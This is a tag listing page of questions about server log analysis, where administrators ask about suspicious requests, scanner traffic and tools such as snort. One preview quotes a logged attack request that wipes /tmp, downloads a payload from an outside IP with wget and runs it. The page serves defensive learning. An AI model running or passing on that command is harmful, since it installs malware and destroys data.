Questions tagged [log-analysis]

74 questions
36
votes
2 answers

How to prevent users from executing commands through browser URL?

I have very little experience with security (still learning) however was combing through my logs and I noticed the following request: "GET…
user3718908
25
votes
1 answer

Why am I receiving HTTP GETs for a domain I don't own?

I am running a Centos7 web server. I noticed a few strange HTTP GET requests like these: 94.185.83.100 - - [29/Feb/2016:23:29:00 +0530] "GET http://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0)…
Sriram
14
votes
1 answer

How can I practice log file analysis?

There are a lot of excellent resources to sharpen your pentesting skills (like Hackthebox, Vulnhub, Juiceshop, Burp Suite Academy and so on), but I couldn't find something similar for forensics, especially log file analysis. I thought about setting…
13
votes
2 answers

Weird Log Record from researchscan1.eecs.berkeley.edu (169.229.3.91) - is this a hack attempt?

I was looking through my ufw log record when I found this line: 169.229.3.91 - - [19/Feb/2016:13:21:52 +0100] "\xCEA\x81\xCF\x02\x03\xFCAm\xB8\xBF]1\xBE~0^\xCD\xA9\x05(\x8D`\xD9\x9D\x9D\x9C\x15m" 400 166 "-" "-" Is this a hack attempt?
9
votes
1 answer

Which ssh exploit works by changing the user name in the middle of the process?

Every few hours, I get a few of those in my server logs: sshd[...]: Disconnecting: Change of username or service not allowed: (httpd,ssh-connection) -> (http,ssh-connection) [preauth] sshd[...]: Disconnecting: Change of username or service not…
Heinzi
6
votes
1 answer

Looking for resources for interpreting my security logs

I am currently setting up an Apache web server on a Linux machine at my house. I am working on a website project which will allow users to log in to complete certain work. There is no open registration on this website. Accounts must be issued by…
Jim Baize
5
votes
0 answers

http request: your killing me smalls

I was looking through my Apache Status in WHM and noticed this odd line in the log: POST /your/killing/me/smalls.jpg HTTP/1.1 It is mostly from 54.86.11.108 but I have seen at least one other IP. I've tried to search this, but only turn up a movie…
RozzA
5
votes
2 answers

How can I read snort logs in NIDS mode?

I am reading some snort logs from a firewall, I could read some with "snort -r file" But when I had tried the newest logs I get this error: snort -r snort.log Running in packet dump mode --== Initializing Snort ==-- Initializing Output…
bugsam
4
votes
2 answers

Log of all processes running on a computer

I'm new to the security domain and I want to ask - Does every program leave an 'imprint' in a log of some kind, in a laptop or a PC - of whatever process it ran. If yes, can they be analysed?
Prathiba
4
votes
0 answers

Obtaining large data sets for research: MySQL, PHP, Apache, etc

I have been looking around the web for large data sets (specifically web related log files - MySQL, PHP, Apache, and so on) that contains data of attempted intrusions/exploits. I am doing some research on threat intelligence and I'd like to analyze…
user0000001
4
votes
1 answer

What vulnerability might this invalid HTTP_HOST value be trying to exploit?

I just received an error email from my home web-server (It's a low traffic site, and since it's running a Django application I've written myself getting an email on errors helps me find bugs). Subject: [Django] ERROR (EXTERNAL IP): Invalid HTTP_HOST…
4
votes
2 answers

The UK Terror Watchdog says this is very difficult in practise, is it?

I saw this quote today in the Guardian David Anderson QC, the terror legislation watchdog commissioned to report on the state of Britain’s surveillance laws in the aftermath of Snowden’s disclosures, has previously said that internet…
ian
3
votes
1 answer

How to detect changing IP address and user agent on a HTTP session?

I have some HTTP logs where I see the hacker changing his IP every request, and occasionally changing his useragent. Is there a way to detect this automatically? Perhaps a snort rule? or any other way?
user77568
3
votes
2 answers

Regular Expressions for common exploits

I patched for shellshock and was barraged a few days later. However, I would not have known any attempts were made at all if not for a regular expression I found on the internet. This has inspired me to look further into my logs. Is there any…
Dylan Katz
3
votes
1 answer

Why request shell commands from nginx?

I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs: 170.81.46.70 - - "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.14.224.220/jaws;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello,…
Artimithe55